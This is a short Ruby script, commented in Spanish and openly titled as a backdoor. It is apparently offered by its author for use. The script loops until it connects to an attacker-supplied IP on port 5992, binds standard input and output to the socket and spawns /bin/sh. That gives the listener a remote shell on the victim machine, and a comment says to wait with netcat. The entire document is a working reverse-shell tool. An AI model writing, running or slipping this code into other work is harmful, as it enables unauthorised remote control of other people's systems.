#Backdoor en Ruby. #Dejar netcat a la escucha en PC atacante #Coded by pRotos #protos.nu@gmail.com require 'socket' sock=nil ipatack='' puerto=5992 until sock begin sock=TCPSocket.new(ipatack, puerto) rescue Errno::ECONNREFUSED end end sock.print("**********************\n* Ruby Backdoor *\n* Coded by pRotos *\n**********************\n") sock.print("Conexion Establecida\n") $stdout.reopen(sock) $stdin.reopen(sock) sock.print("[ReverseShell]\n") while sock system('/bin/sh') end